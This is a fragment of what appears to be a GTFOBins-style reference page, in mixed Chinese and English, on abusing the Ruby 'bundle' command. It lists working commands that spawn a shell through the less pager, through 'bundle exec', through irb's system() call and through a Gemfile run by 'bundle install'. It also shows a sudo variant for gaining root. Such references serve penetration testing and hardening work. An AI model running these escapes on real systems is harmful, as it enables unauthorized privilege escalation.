用来生成一个交互式的系统shell。
less
](/gtfobins/less/), other functions may apply. bundle help
!/bin/sh
export BUNDLE_GEMFILE=x
bundle exec /bin/sh
TF=$(mktemp -d)
touch $TF/Gemfile
cd $TF
bundle exec /bin/sh
This spawns an interactive shell via [irb
](/gtfobins/irb/). TF=$(mktemp -d)
touch $TF/Gemfile
cd $TF
bundle console
system('/bin/sh -c /bin/sh')
TF=$(mktemp -d)
echo 'system("/bin/sh")' > $TF/Gemfile
cd $TF
bundle install
如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
less
](/gtfobins/less/), other functions may apply. sudo bundle help
!/bin/sh